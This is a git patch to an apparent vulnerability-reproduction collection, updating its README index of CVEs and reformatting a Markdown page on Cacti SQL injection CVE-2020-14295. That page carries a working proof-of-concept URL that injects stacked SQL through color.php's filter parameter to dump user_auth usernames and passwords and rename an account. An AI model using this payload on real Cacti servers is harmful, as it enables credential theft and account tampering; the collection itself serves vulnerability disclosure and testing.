From 0f6b3700ad155f72c25dab29ff32e731c14eb6fa Mon Sep 17 00:00:00 2001 From: Threekiii Date: Mon, 10 Feb 2025 14:01:49 +0800 Subject: [PATCH] update --- README.md | 9 ++-- .../Cacti SQL 注入漏洞 CVE-2020-14295.md | 48 +++++++++---------- 2 files changed, 30 insertions(+), 27 deletions(-) diff --git a/README.md b/README.md index 4b1bc01..9934f46 100644 --- a/README.md +++ b/README.md @@ -111,6 +111,10 @@ * 禅道 V16.5 SQL 注入 CNVD-2022-42853 * 禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709 * 齐博CMS V7 job.php 任意文件读取漏洞 +- MYPOC + + * Cacti 任意文件创建致远程代码执行漏洞 CVE-2025-24367 + * Cacti 多行 SNMP 响应验证致代码执行漏洞 CVE-2025-22604 - OA产品漏洞 * O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740 @@ -586,9 +590,8 @@ * Apache Log4j2 lookup JNDI 注入漏洞 CVE-2021-44228 * Apache Mod_jk 访问控制权限绕过 CVE-2018-11759 * Apache NiFi Api 远程代码执行 RCE - * Apache RocketMQ RCE 漏洞 CVE-2023-33246 - * Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582 - * Apache RocketMQ 远程命令执行漏洞 CVE-2023-33246 + * Apache RocketMQ Broker 远程命令执行漏洞 CVE-2023-33246 + * Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582 * Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580 * Apache Shiro 1.2.4 反序列化漏洞 CVE-2016-4437 * Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933 diff --git a/Web应用漏洞/Cacti SQL 注入漏洞 CVE-2020-14295.md b/Web应用漏洞/Cacti SQL 注入漏洞 CVE-2020-14295.md index cc79c8c..6ab0a93 100644 --- a/Web应用漏洞/Cacti SQL 注入漏洞 CVE-2020-14295.md +++ b/Web应用漏洞/Cacti SQL 注入漏洞 CVE-2020-14295.md @@ -1,24 +1,24 @@ -# Cacti SQL 注入漏洞 CVE-2020-14295 - -## 漏洞描述 - -Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞,允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询,所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。 - -参考链接: - -- https://github.com/Cacti/cacti/issues/3622 - -## 漏洞影响 - -``` -Cacti < 1.2.13 -``` - -## 漏洞复现 - -poc: - -``` -/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+- -``` - +# Cacti SQL 注入漏洞 CVE-2020-14295 + +## 漏洞描述 + +Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞,允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询,所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。 + +参考链接: + +- https://github.com/Cacti/cacti/issues/3622 + +## 漏洞影响 + +``` +Cacti < 1.2.13 +``` + +## 漏洞复现 + +poc: + +``` +/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+- +``` +